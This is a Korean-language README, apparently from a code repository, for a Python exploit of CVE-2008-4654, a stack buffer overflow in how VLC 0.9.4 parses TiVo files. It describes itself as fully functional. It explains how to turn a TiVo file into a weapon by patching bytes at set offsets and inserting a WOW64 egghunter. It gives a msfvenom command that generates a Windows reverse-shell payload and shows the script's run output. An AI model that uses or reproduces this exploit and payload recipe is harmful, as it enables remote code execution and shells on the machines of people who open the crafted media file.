
VideoLan의 VLC Media Player 0.9.4가 TiVo 파일을 처리할 때 발생하는 스택 기반 버퍼 오버플로 취약점에 대한 완전한 기능을 갖춘 익스플로잇입니다.
VideoLan의 VLC Media Player 0.9.4가 TiVo 파일을 처리할 때 발생하는 스택 기반 버퍼 오버플로 취약점 CVE-2008-4654에 대한 완전한 기능을 갖춘 익스플로잇입니다. 64비트 Windows 시스템에서 실행되는 32비트 바이너리를 대상으로 하며, 제한된 스택 공간을 우회하기 위해 WOW64 egghunter를 사용합니다.
스크립트 업데이트:
buf = b'[...]'를 자신의 셸코드(예: msfvenom에서 생성한 셸코드)로 교체하세요.EGG_HUNTER_WOW64 셸코드를 조정하세요.python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
Transform a given TiVo file into a weapon with predefined shellcode.
options:
-h, --help show this help message and exit
--input INPUT Path to the input TiVo file to be weaponized.
--output OUTPUT Path where the modified (weaponized) TiVo file will be saved.
TIVO_PES_FILEID)을 검색합니다.b"\x00\x00\x00\xff"로 덮어써서 스택 오버플로로 이어지는 경계를 벗어난 읽기를 유발합니다.TIVO_PES_FILEID 뒤 92바이트 지점의 다른 영역을 사용자 정의 페이로드로 교체합니다.w00tw00t를 검색하는 WOW64 전용 egghunter.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]'를 교체하세요.PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty
\x00 외에 주요 bad character가 없어 페이로드 생성이 간단합니다.